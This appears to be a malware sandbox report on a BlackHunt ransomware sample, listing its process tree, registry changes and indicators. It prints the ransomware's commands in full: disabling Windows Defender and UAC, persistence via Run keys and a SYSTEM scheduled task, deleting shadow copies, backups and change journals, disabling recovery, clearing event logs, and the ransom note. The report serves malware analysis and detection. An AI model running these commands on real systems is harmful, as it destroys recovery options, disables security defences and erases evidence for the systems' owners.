PID 64 wrote to memory of 4616	64	cmd.exe	reg.exe
PID 4848 wrote to memory of 4460	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 4848 wrote to memory of 4460	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 4848 wrote to memory of 1284	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 4848 wrote to memory of 1284	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 1756 wrote to memory of 1740	1756	cmd.exe	reg.exe
PID 1756 wrote to memory of 1740	1756	cmd.exe	reg.exe
PID 4848 wrote to memory of 2944	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 4848 wrote to memory of 2944	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 4244 wrote to memory of 1840	4244	cmd.exe	reg.exe
PID 4244 wrote to memory of 1840	4244	cmd.exe	reg.exe
PID 5084 wrote to memory of 4688	5084	cmd.exe	reg.exe
PID 5084 wrote to memory of 4688	5084	cmd.exe	reg.exe
PID 4848 wrote to memory of 5112	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 4848 wrote to memory of 5112	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 4848 wrote to memory of 1348	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 4848 wrote to memory of 1348	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 4460 wrote to memory of 4800	4460	cmd.exe	reg.exe
PID 4460 wrote to memory of 4800	4460	cmd.exe	reg.exe
PID 2944 wrote to memory of 4148	2944	cmd.exe	reg.exe
PID 2944 wrote to memory of 4148	2944	cmd.exe	reg.exe
PID 4848 wrote to memory of 536	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 4848 wrote to memory of 536	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 4848 wrote to memory of 4260	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 4848 wrote to memory of 4260	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 1284 wrote to memory of 2876	1284	cmd.exe	reg.exe
PID 1284 wrote to memory of 2876	1284	cmd.exe	reg.exe
PID 1348 wrote to memory of 4768	1348	cmd.exe	reg.exe
PID 1348 wrote to memory of 4768	1348	cmd.exe	reg.exe
PID 4848 wrote to memory of 4884	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 4848 wrote to memory of 4884	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 4848 wrote to memory of 5072	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 4848 wrote to memory of 5072	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 5112 wrote to memory of 3532	5112	cmd.exe	reg.exe
PID 5112 wrote to memory of 3532	5112	cmd.exe	reg.exe
PID 4848 wrote to memory of 440	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 4848 wrote to memory of 440	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 4848 wrote to memory of 60	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 4848 wrote to memory of 60	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 536 wrote to memory of 5096	536	cmd.exe	reg.exe
PID 536 wrote to memory of 5096	536	cmd.exe	reg.exe
PID 4848 wrote to memory of 4960	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 4848 wrote to memory of 4960	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 4848 wrote to memory of 1000	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 4848 wrote to memory of 1000	4848	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe	cmd.exe
PID 5072 wrote to memory of 4144	5072	cmd.exe	reg.exe
PID 5072 wrote to memory of 4144	5072	cmd.exe	reg.exe

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

Processes:

f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe

C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
"C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe"
1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4848

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Black" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:2284

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Black" /f
3⤵
- Modifies registry class
PID:3756

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Black\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:64

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Black\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
3⤵
- Modifies registry class
PID:4616

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Black" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1908

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Classes\Black" /f
3⤵
- Modifies registry class
PID:5068

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Black\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1756

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Classes\Black\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
3⤵
- Modifies registry class
PID:1740

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:4244

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
3⤵
- Adds Run key to start application
PID:1840

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:5084

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
3⤵
PID:4688

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:4460

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4800

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1284

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
3⤵
PID:2876

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:2944

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
3⤵
PID:4148

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:5112

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
3⤵
PID:3532

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1348

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
3⤵
PID:4768

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:536

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
3⤵
PID:5096

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
2⤵
PID:4260

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
3⤵
PID:4380

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
2⤵
PID:4884

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
3⤵
PID:4064

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:5072

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
3⤵
PID:4144

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
2⤵
PID:440

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
3⤵
PID:3016

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
2⤵
PID:60

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
3⤵
PID:1948

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
2⤵
PID:4960

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
3⤵
PID:1856

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
2⤵
PID:1000

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
3⤵
PID:4752

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
2⤵
PID:4496

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
3⤵
PID:4216

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
2⤵
PID:1972

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
3⤵
PID:4784

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
2⤵
PID:1776

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
3⤵
PID:4116

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
2⤵
PID:732

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
3⤵
PID:1788

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
2⤵
PID:1168

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
3⤵
PID:4588

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
2⤵
PID:3252

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
3⤵
PID:3040

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
2⤵
PID:3656

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
3⤵
PID:4608

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
2⤵
PID:4652

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
3⤵
PID:5084

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
2⤵
PID:5080

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
3⤵
PID:1316

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
2⤵
PID:3212

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
3⤵
PID:4156

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityService" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -backups " /f
2⤵
PID:4468

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityService" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -backups " /f
3⤵
- Adds Run key to start application
PID:2392

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c SchTasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Update service Windows System" /TR "C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -backups" /f
2⤵
PID:3292

C:\Windows\system32\schtasks.exe
SchTasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Update service Windows System" /TR "C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -backups" /f
3⤵
- Creates scheduled task(s)
PID:3732

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
2⤵
PID:1944

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:4168

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
2⤵
PID:4152

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled No
3⤵
- Modifies boot configuration data using bcdedit
PID:2060

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
2⤵
PID:548

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
3⤵
- Modifies boot configuration data using bcdedit
PID:2528

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
2⤵
PID:4460

C:\Windows\system32\fsutil.exe
fsutil.exe usn deletejournal /D C:
3⤵
- Deletes NTFS Change Journal
PID:1016

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
2⤵
PID:4524

C:\Windows\system32\wbadmin.exe
wbadmin.exe delete catalog -quiet
3⤵
- Deletes backup catalog
PID:5072

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
2⤵
PID:1708

C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
3⤵
PID:4576

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\
2⤵
PID:2420

C:\Windows\system32\fsutil.exe
fsutil usn deletejournal /D C:\
3⤵
PID:796

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\
2⤵
PID:2208

C:\Windows\system32\fsutil.exe
fsutil usn deletejournal /D M:\
3⤵
- Enumerates connected drives
PID:3112

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup
2⤵
PID:1848

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl Setup
3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3748

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System
2⤵
PID:3756

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl System
3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1192

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application
2⤵
PID:3212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl Application
3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4404

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security
2⤵
PID:2968

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl Security
3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2348

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false
2⤵
PID:4360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl Security /e:false
3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3032

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
2⤵
PID:1016

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:476

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
2⤵
PID:5096

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled No
3⤵
- Modifies boot configuration data using bcdedit
PID:5004

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
2⤵
PID:2272

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
3⤵
- Modifies boot configuration data using bcdedit
PID:2876

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
2⤵
PID:264

C:\Windows\system32\fsutil.exe
fsutil.exe usn deletejournal /D C:
3⤵
- Deletes NTFS Change Journal
PID:5108

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
2⤵
PID:2788

C:\Windows\system32\wbadmin.exe
wbadmin.exe delete catalog -quiet
3⤵
- Deletes backup catalog
PID:3772

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
2⤵
PID:920

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
3⤵
PID:5024

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [amike1096@gmail.com] AND [onion746@onionmail.com] " /f
2⤵
PID:1156

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [amike1096@gmail.com] AND [onion746@onionmail.com] " /f
3⤵
PID:5044

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
2⤵
PID:5056

C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
3⤵
PID:540

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG DELETE "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "HealthService" /f
2⤵
PID:628

C:\Windows\system32\reg.exe
REG DELETE "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "HealthService" /f
3⤵
PID:820

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
2⤵
PID:4700

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
3⤵
PID:3860

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
2⤵
PID:5040

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
3⤵
PID:2284

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f
2⤵
PID:1240

C:\Windows\system32\taskkill.exe
taskkill /IM mshta.exe /f
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4532

C:\Windows\System32\cmd.exe
